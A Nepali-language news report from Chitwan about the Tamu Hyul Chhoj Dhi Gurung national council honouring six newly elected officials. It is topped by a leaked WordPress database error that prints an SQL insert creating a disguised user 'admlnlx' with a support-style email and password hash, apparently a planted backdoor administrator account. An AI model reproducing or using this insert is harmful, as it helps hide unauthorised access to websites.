WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMezdYPVCaOOvfx425wmVMwfD.axrM0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 23:12:39', '', 'admlnlx', 'admlnlx')
चितवन, फागुन ३–
‘तमु ह्युल छोज धी गुरुङ’ राष्ट्रिय परिषद् जिल्ला कार्य समिति चितवनले आज भरतपुरमा बधाई तथा सम्मान कार्यक्रम गरेको छ । कार्यक्रममा गत माघ २२ गते देखी २४ गते सम्म चलेको ऐतिहासिक तेस्रो केन्द्रिय राष्ट्रिय महाधिबेशनमा निर्बिरोध चयन हुनुभएका ६ जना पदाधिकारीहरुलाई परिषदका अध्यक्ष गणेशबहादुर गुरुङद्धारा सम्मान गरीएको थियो ।
महाधिबेशनमा सर्बसम्मतले चयन हुनुभएका पदाधिकारीहरुमा वरिष्ठ उपाध्यक्षमा कर्णबहादुर तमु, संयोजक अनुशासन समितिमा ज्ञानबहादुर तमु, प्रदेश नम्बर ३ को प्रमुख तथा केन्द्रिय सदस्यमा सन्तलाल गुरुङ, पदमबहादुर तमु, मिना तमु, भैखुकु तमु रहेका छन् । परिषदका अध्यक्ष गणेशबहादुर गरुुङले चयन हुनुभएका पदाधिकारीहरुलाई सफल कार्यकालको शुभकामना दिदै उहाँले गुरुङहरुको धर्म, जाति, भेषभुषा र सँस्कृतिलाइ सधैभरी जोगाइ राख्ने कार्यमा उत्कृष्ट योगदान रहोस भन्दै शुभकामना मन्तब्य समेत ब्यक्त गर्नुभएको थियो ।
महाधिबेशनको लागि तमु ह्युल छोज धी गुरुङ’ राष्ट्रिय परिषद जिल्ला कार्य समिति चितवनबाट एक लाख रुपैयाँको आर्थिक सहयोग समेत गरेको कार्य समिति चितवनले जनाएको छ ।